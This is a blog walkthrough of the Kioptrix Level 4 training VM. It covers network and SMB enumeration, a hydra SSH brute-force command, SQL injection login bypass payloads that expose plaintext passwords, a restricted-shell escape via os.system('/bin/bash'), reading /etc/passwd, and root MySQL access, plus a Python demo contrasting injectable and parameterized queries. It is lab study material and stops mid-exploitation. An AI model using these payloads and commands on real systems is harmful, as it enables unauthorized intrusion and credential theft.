Tuesday 16 August 2016

Kioptrix Level 4


This document is for educational purposes only; I take no responsibility for other people's actions. This is a review of the Kioptrix Level 4 (1.3) vulnerable VM: 
http://www.kioptrix.com/dlvm/Kioptrix4_vmware.rar

Currently scanning: Finished!   |   Screen View: Unique Hosts              
                                                                             
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname    
 -----------------------------------------------------------------------------
 192.168.180.1   00:50:56:c0:00:08      1      60  VMware, Inc.              
 192.168.180.2   00:50:56:f9:f6:4a      1      60  VMware, Inc.              
 192.168.180.136 00:0c:29:08:fb:c7      1      60  VMware, Inc.              
 192.168.180.254 00:50:56:f4:3f:7c      1      60  VMware, Inc.  

nmap -sV -T4 -O -F --version-light 192.168.180.136

Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-05 08:29 EDT
Nmap scan report for 192.168.180.136
Host is up (0.00020s latency).
Not shown: 65 closed ports, 31 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:08:FB:C7 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.62 seconds

nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.136

Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-05 08:31 EDT
NSE: Loaded 132 scripts for scanning.
<omitted>
Host is up, received arp-response (0.00021s latency).
Scanned at 2016-07-05 08:31:51 EDT for 33s
Not shown: 566 closed ports, 430 filtered ports
Reason: 566 resets and 430 no-responses
PORT    STATE SERVICE     REASON         VERSION
22/tcp  open  ssh         syn-ack ttl 64 OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|   2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApA/UX2iq4JYXncTEDfBoyJWguuDkWDvyw4HlLyc1UBT3Pn2wnYLYa0MjwkBtPilmf5X1zK1z3su7oBEcSEt6o7RzDEUbC1O6nRvY4oSKwBD0qLaIHM1V5CZ+YDtLneY6IriJjHJ0DgNyXalPbQ36VZgu20o9dH8ItDkjlZTxRHPE6RnPiD1aZSLo452LNU3N+/2M/ny7QMvIyPNkcojeZQWS7RRSDa2lEUw1X1ECL6zCMiWC0lhciZf5ieum9MnATTF3dgk4BnCq6dfdEvae0avSypMcs6no2CJ2j9PPoAQ1VWj/WlAZzEbfna9YQ2cx8sW/W/9GfKA5SuLFt1u0iQ==
80/tcp  open  http        syn-ack ttl 64 Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:08:FB:C7 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
TCP/IP fingerprint: <omitted>

Uptime guess: 0.004 days (since Tue Jul  5 08:27:17 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=200 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KIOPTRIX4<00>        Flags: <unique><active>
|   KIOPTRIX4<03>        Flags: <unique><active>
|   KIOPTRIX4<20>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 51861/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 63161/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 12408/udp): CLEAN (Failed to receive data)
|   Check 4 (port 10447/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name:
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2016-07-05T11:32:22-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

TRACEROUTE
HOP RTT     ADDRESS
1   0.21 ms 192.168.180.136

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:32
Completed NSE at 08:32, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:32
Completed NSE at 08:32, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.71 seconds
           Raw packets sent: 1450 (64.546KB) | Rcvd: 586 (24.154KB)

nmap -sC -sU -T4 -A -v -v -Pn --top-ports 200 192.168.180.136

Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-05 08:34 EDT
<omitted some large info>
Scanned at 2016-07-05 08:34:11 EDT for 1193s
Not shown: 954 closed ports
Reason: 954 port-unreaches
PORT      STATE         SERVICE     REASON              VERSION
<omitted>
137/udp   open          netbios-ns  udp-response ttl 64 Microsoft Windows XP netbios-ssn
<omitted>
MAC Address: 00:0C:29:08:FB:C7 (VMware)
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint: <omitted>

Network Distance: 1 hop
Service Info: Host: KIOPTRIX4; OS: Windows XP; CPE: cpe:/o:microsoft:windows_xp

Host script results:
| nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KIOPTRIX4<00>        Flags: <unique><active>
|   KIOPTRIX4<03>        Flags: <unique><active>
|   KIOPTRIX4<20>        Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00

TRACEROUTE
HOP RTT     ADDRESS
1   0.22 ms 192.168.180.136

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:54
Completed NSE at 08:54, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:54
Completed NSE at 08:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1193.64 seconds
           Raw packets sent: 1710 (50.767KB) | Rcvd: 1046 (60.396KB)

dirb http://192.168.180.136

-----------------
DIRB v2.22  
By The Dark Raver
-----------------

START_TIME: Tue Jul  5 08:57:06 2016
URL_BASE: http://192.168.180.136/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                        

---- Scanning URL: http://192.168.180.136/ ----
+ http://192.168.180.136/cgi-bin/ (CODE:403|SIZE:330)                        
==> DIRECTORY: http://192.168.180.136/images/                                
+ http://192.168.180.136/index (CODE:200|SIZE:1255)                          
+ http://192.168.180.136/index.php (CODE:200|SIZE:1255)                      
==> DIRECTORY: http://192.168.180.136/john/                                  
+ http://192.168.180.136/logout (CODE:302|SIZE:0)                            
+ http://192.168.180.136/member (CODE:302|SIZE:220)                          
+ http://192.168.180.136/server-status (CODE:403|SIZE:335)                  
                                                                             
---- Entering directory: http://192.168.180.136/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                      
    (Use mode '-w' if you want to scan it anyway)
                                                                             
---- Entering directory: http://192.168.180.136/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                      
    (Use mode '-w' if you want to scan it anyway)
                                                                             
-----------------
END_TIME: Tue Jul  5 08:57:07 2016
DOWNLOADED: 4612 - FOUND: 6


wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.136/FUZZ
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                      *
********************************************************

Target: http://192.168.180.136/FUZZ
Total requests: 3036

==================================================================
ID Response   Lines      Word         Chars          Request    
==================================================================

00540:  C=403     10 L      33 W    330 Ch  "cgi-bin/"
...
01341:  C=200     45 L      94 W   1255 Ch  "index"
...
01349:  C=301      9 L      31 W    358 Ch  "images"
...
01609:  C=302      0 L       0 W      0 Ch  "logout"
...
01726:  C=302      1 L      22 W    220 Ch  "member"
...
01745:  C=301      9 L      31 W    356 Ch  "john"
...
02311:  C=301      9 L      31 W    358 Ch  "robert"
...
03035:  C=404      9 L      35 W    324 Ch  "t-bone"
...
^C

nbtscan 192.168.180.136
Doing NBT name scan for addresses from 192.168.180.136

IP address       NetBIOS Name     Server    User             MAC address      
------------------------------------------------------------------------------
192.168.180.136  KIOPTRIX4        <server>  KIOPTRIX4        00:00:00:00:00:00

root@kali:/# enum4linux -a 192.168.180.136
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jul  5 09:06:47 2016

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.180.136
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ======================================================= 
|    Enumerating Workgroup/Domain on 192.168.180.136    |
 ======================================================= 
[+] Got domain/workgroup name: WORKGROUP

 =============================================== 
|    Nbtstat Information for 192.168.180.136    |
 =============================================== 
Looking up status of 192.168.180.136
KIOPTRIX4       <00> -         B <ACTIVE>  Workstation Service
KIOPTRIX4       <03> -         B <ACTIVE>  Messenger Service
KIOPTRIX4       <20> -         B <ACTIVE>  File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name

MAC Address = 00-00-00-00-00-00

 ======================================== 
|    Session Check on 192.168.180.136    |
 ======================================== 
[+] Server 192.168.180.136 allows sessions using username '', password ''

 ============================================== 
|    Getting domain SID for 192.168.180.136    |
 ============================================== 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ========================================= 
|    OS information on 192.168.180.136    |
 ========================================= 
[+] Got OS info for 192.168.180.136 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
[+] Got OS info for 192.168.180.136 from srvinfo:
KIOPTRIX4      Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
platform_id     : 500
os version      : 4.9
server type     : 0x809a03

 ================================ 
|    Users on 192.168.180.136    |
 ================================ 
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert Name: ,,, Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root Name: root Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john Name: ,,, Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret Name: loneferret,,, Desc: (null)

user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]

 ============================================ 
|    Share Enumeration on 192.168.180.136    |
 ============================================ 
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
IPC$            IPC       IPC Service (Kioptrix4 server (Samba, Ubuntu))

Server               Comment
---------            -------
KIOPTRIX4            Kioptrix4 server (Samba, Ubuntu)

Workgroup            Master
---------            -------
---- ----------------
WORKGROUP            KIOPTRIX4

[+] Attempting to map shares on 192.168.180.136
//192.168.180.136/print$ Mapping: DENIED, Listing: N/A
//192.168.180.136/IPC$ [E] Can't understand response:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
NT_STATUS_NETWORK_ACCESS_DENIED listing \*

 ======================================================= 
|    Password Policy Information for 192.168.180.136    |
 ======================================================= 

[+] Attaching to 192.168.180.136 using a NULL share

[+] Trying protocol 445/SMB...

[+] Found domain(s):

[+] KIOPTRIX4
[+] Builtin

[+] Password Info for Domain: KIOPTRIX4

[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0


 ================================= 
|    Groups on 192.168.180.136    |
 ================================= 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ========================================================================== 
|    Users on 192.168.180.136 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================== 
[I] Found new SID: S-1-5-21-2529228035-991147148-3991031631
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)
[+] Enumerating users using SID S-1-5-21-2529228035-991147148-3991031631 and logon username '', password ''
S-1-5-21-2529228035-991147148-3991031631-500 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-501 KIOPTRIX4\nobody (Local User)
<omitted>
S-1-5-21-2529228035-991147148-3991031631-513 KIOPTRIX4\None (Domain Group)
<omitted>
S-1-5-21-2529228035-991147148-3991031631-1000 KIOPTRIX4\root (Local User)
<omitted>
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
<omitted>
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
<omitted>

 ================================================ 
|    Getting printer info for 192.168.180.136    |
 ================================================ 
No printers returned.


enum4linux complete on Tue Jul  5 09:06:53 2016

root@kali:/# smbclient -N -L 192.168.180.136
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
IPC$            IPC       IPC Service (Kioptrix4 server (Samba, Ubuntu))
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

Server               Comment
---------            -------
KIOPTRIX4            Kioptrix4 server (Samba, Ubuntu)

Workgroup            Master
---------            -------
-----------------------------------------
WORKGROUP            KIOPTRIX4

This just wasted my time:
hydra -l loneferret -P darkc0de.lst 192.168.180.136 ssh

So I left it and continued:
http://192.168.180.136/john/

Let's try the following as the password:
' OR '1'='1
Note the space at the end of the next query:
' OR '1'='1' -- 
' OR '1'='1' ({
' OR '1'='1' /*

What we get is:
Member's Control Panel
Username : john
Password : MyNameIsJohn

Username  robert
Password  ADGAdsafdfwt4gadfga==
' OR 1=1 #
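These payloads work because the login query is assembled by pasting the submitted values into the SQL text. The following Python is an added example, not the VM's checklogin.php: SQLite stands in for MySQL, the members table with its two plaintext rows is constructed from the values shown above, and the two page payloads that are valid SQLite are run against a concatenated query and against a parameterized one that also stores salted hashes instead of plaintext (`' OR 1=1 #` is left out because `#` starts a comment only in MySQL).

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed stand-in for the VM's "members" table, using the two accounts the
# control panel revealed; like the original, it stores passwords in plaintext.
SAMPLE_MEMBERS = [("john", "MyNameIsJohn"), ("robert", "ADGAdsafdfwt4gadfga==")]

# Two of the page's payloads that are valid SQL in SQLite as well as MySQL.
PAGE_PAYLOADS = ["' OR '1'='1", "' OR '1'='1' -- "]

PBKDF2_ROUNDS = 100_000


def make_vulnerable_db():
    """In-memory table in the shape checklogin.php queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)", SAMPLE_MEMBERS)
    return conn


def vulnerable_login(conn, username, password):
    """Query built by string interpolation. The password value is pasted into the
    SQL text, so a quote in it ends the literal and OR '1'='1' becomes part of
    the WHERE clause; AND binds tighter than OR, so every row matches."""
    sql = ("SELECT username FROM members WHERE username='%s' AND password='%s'"
           % (username, password))
    return sorted(row[0] for row in conn.execute(sql))


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256, stored as hex(salt)$hex(digest)."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + digest.hex()


def verify_password(stored, candidate):
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", candidate.encode(),
                                 bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    # constant-time comparison so timing does not leak how many bytes matched
    return hmac.compare_digest(digest.hex(), digest_hex)


def make_hardened_db():
    """Same table, but holding password hashes instead of the plaintext the page shows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT PRIMARY KEY, password_hash TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)",
                     [(u, hash_password(p)) for u, p in SAMPLE_MEMBERS])
    return conn


def hardened_login(conn, username, password):
    """Parameterized lookup: the driver sends the username as data, never as SQL
    text, so quotes and comment markers cannot change the query. The password is
    then checked against the stored hash in Python, not inside the WHERE clause."""
    row = conn.execute("SELECT password_hash FROM members WHERE username=?",
                       (username,)).fetchone()
    return row is not None and verify_password(row[0], password)


if __name__ == "__main__":
    vuln, hard = make_vulnerable_db(), make_hardened_db()
    for payload in PAGE_PAYLOADS:
        print("vulnerable:", repr(payload), "->", vulnerable_login(vuln, "john", payload))
        print("hardened  :", repr(payload), "->", hardened_login(hard, "john", payload))
```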


The SSH password is the same, so let's try:
ssh john@192.168.180.136
The authenticity of host '192.168.180.136 (192.168.180.136)' can't be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.180.136' (RSA) to the list of known hosts.
john@192.168.180.136's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands

john:~$ 

john:~$ sudo su
*** forbidden sudo -> sudo su

cd /
*** forbidden path -> "/"
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.

*** forbidden path -> "/"
*** Kicked out
Connection to 192.168.180.136 closed.

Haha, well. Let us try once more.

Type '?' or 'help' to get the list of allowed commands
john:~$ help
cd  clear  echo  exit  help  ll  lpath  ls

echo os.system('/bin/bash')

john@Kioptrix4:/home/loneferret$ ls -la
total 44
drwxr-xr-x 2 loneferret loneferret 4096 2012-02-06 16:38 .
drwxr-xr-x 5 root       root       4096 2012-02-04 18:05 ..
-rw------- 1 loneferret loneferret   62 2012-02-06 20:24 .bash_history
-rw-r--r-- 1 loneferret loneferret  220 2012-02-04 09:58 .bash_logout
-rw-r--r-- 1 loneferret loneferret 2940 2012-02-04 09:58 .bashrc
-rw-r--r-- 1 loneferret loneferret    1 2012-02-05 10:37 .lhistory
-rw------- 1 root       root         68 2012-02-04 10:05 .my.cnf.5086
-rw------- 1 root       root          1 2012-02-04 10:05 .mysql.5086
-rw------- 1 loneferret loneferret    1 2012-02-05 10:38 .mysql_history
-rw------- 1 loneferret loneferret    9 2012-02-06 16:39 .nano_history
-rw-r--r-- 1 loneferret loneferret  586 2012-02-04 09:58 .profile
-rw-r--r-- 1 loneferret loneferret    0 2012-02-04 10:01 .sudo_as_admin_successful

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell

john@Kioptrix4:/var/www$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

cat debian_version
lenny/sid

john@Kioptrix4:/etc/ssh$ ps -aux
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1   2844  1692 ?        Ss   11:22   0:01 /sbin/init
root         2  0.0  0.0      0     0 ?        S<   11:22   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S<   11:22   0:00 [migration/0]
root         4  0.0  0.0      0     0 ?        S<   11:22   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   11:22   0:00 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S<   11:22   0:00 [events/0]
root         7  0.0  0.0      0     0 ?        S<   11:22   0:00 [khelper]
root        41  0.0  0.0      0     0 ?        S<   11:22   0:00 [kblockd/0]
root        44  0.0  0.0      0     0 ?        S<   11:22   0:00 [kacpid]
root        45  0.0  0.0      0     0 ?        S<   11:22   0:00 [kacpi_notify]
root       170  0.0  0.0      0     0 ?        S<   11:22   0:00 [kseriod]
root       209  0.0  0.0      0     0 ?        S    11:22   0:00 [pdflush]
root       210  0.0  0.0      0     0 ?        S    11:22   0:00 [pdflush]
root       211  0.0  0.0      0     0 ?        S<   11:22   0:00 [kswapd0]
root       253  0.0  0.0      0     0 ?        S<   11:22   0:00 [aio/0]
root      1465  0.0  0.0      0     0 ?        S<   11:22   0:00 [ata/0]
root      1468  0.0  0.0      0     0 ?        S<   11:22   0:00 [ata_aux]
root      1475  0.0  0.0      0     0 ?        S<   11:22   0:00 [scsi_eh_0]
root      1481  0.0  0.0      0     0 ?        S<   11:22   0:00 [scsi_eh_1]
root      1494  0.0  0.0      0     0 ?        S<   11:22   0:00 [ksuspend_usbd]
root      1499  0.0  0.0      0     0 ?        S<   11:22   0:00 [khubd]
root      2362  0.0  0.0      0     0 ?        S<   11:22   0:00 [scsi_eh_2]
root      2604  0.0  0.0      0     0 ?        S<   11:22   0:00 [kjournald]
root      2772  0.0  0.0   2104   704 ?        S<s  11:22   0:00 /sbin/udevd --d
root      3078  0.0  0.0      0     0 ?        S<   11:22   0:00 [kgameportd]
root      3216  0.0  0.0      0     0 ?        S<   11:22   0:00 [kpsmoused]
root      4540  0.0  0.0   1716   492 tty4     Ss+  11:22   0:00 /sbin/getty 384
root      4541  0.0  0.0   1716   492 tty5     Ss+  11:22   0:00 /sbin/getty 384
root      4545  0.0  0.0   1716   492 tty2     Ss+  11:22   0:00 /sbin/getty 384
root      4546  0.0  0.0   1716   492 tty3     Ss+  11:22   0:00 /sbin/getty 384
root      4552  0.0  0.0   1716   492 tty6     Ss+  11:22   0:00 /sbin/getty 384
syslog    4589  0.0  0.0   1936   648 ?        Ss   11:22   0:00 /sbin/syslogd -
root      4608  0.0  0.0   1872   540 ?        S    11:22   0:00 /bin/dd bs 1 if
klog      4610  0.0  0.1   3160  2048 ?        Ss   11:22   0:00 /sbin/klogd -P
root      4629  0.0  0.0   5316   988 ?        Ss   11:22   0:01 /usr/sbin/sshd
root      4685  0.0  0.0   1772   524 ?        S    11:22   0:00 /bin/sh /usr/bi
root      4727  0.0  1.5 126988 16276 ?        Sl   11:22   0:00 /usr/sbin/mysql
root      4729  0.0  0.0   1700   556 ?        S    11:22   0:00 logger -p daemo
root      4802  0.0  0.1   6532  1356 ?        Ss   11:22   0:00 /usr/sbin/nmbd
root      4804  0.0  0.2  10108  2540 ?        Ss   11:22   0:00 /usr/sbin/smbd
root      4818  0.0  0.0  10108  1024 ?        S    11:22   0:00 /usr/sbin/smbd
root      4819  0.0  0.1   8084  1340 ?        Ss   11:22   0:00 /usr/sbin/winbi
root      4839  0.0  0.1   8208  1704 ?        S    11:22   0:00 /usr/sbin/winbi
daemon    4840  0.0  0.0   1984   420 ?        Ss   11:22   0:00 /usr/sbin/atd
root      4851  0.0  0.0   2104   884 ?        Ss   11:22   0:00 /usr/sbin/cron
root      4873  0.0  0.5  20464  6196 ?        Ss   11:22   0:00 /usr/sbin/apach
dhcp      4922  0.0  0.0   2440   764 ?        Ss   11:22   0:00 dhclient eth1
root      4929  0.0  0.0   1716   492 tty1     Ss+  11:22   0:00 /sbin/getty 384
root      4944  0.0  0.0   8084   872 ?        S    11:32   0:00 /usr/sbin/winbi
root      4945  0.0  0.1   8092  1264 ?        S    11:32   0:00 /usr/sbin/winbi
www-data  5608  0.0  0.3  20464  3276 ?        S    13:32   0:00 /usr/sbin/apach
root      5626  0.0  0.3  11360  3724 ?        Ss   13:38   0:00 sshd: john [pri
john      5628  0.0  0.1  11516  1860 ?        S    13:38   0:00 sshd: john@pts/
john      5629  0.0  0.3   5892  3816 pts/0    Ss   13:38   0:00 python /bin/ksh
www-data  5640  0.0  0.3  20464  3276 ?        S    13:41   0:00 /usr/sbin/apach
www-data  5641  0.0  0.3  20464  3276 ?        S    13:42   0:00 /usr/sbin/apach
www-data  5642  0.0  0.3  20464  3276 ?        S    13:42   0:00 /usr/sbin/apach
www-data  5643  0.0  0.3  20464  3276 ?        S    13:43   0:00 /usr/sbin/apach
john      5653  0.0  0.0   1772   480 pts/0    S    13:44   0:00 sh -c /bin/bash
john      5654  0.0  0.2   5432  2852 pts/0    R    13:44   0:00 /bin/bash
john      5749  0.0  0.0   2644  1012 pts/0    R+   14:00   0:00 ps -aux

MySQL is running as root.

john@Kioptrix4:/var/www$ cat checklogin.php   
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

mysql -u root -h localhost

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 56
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

Let's play with system permissions:

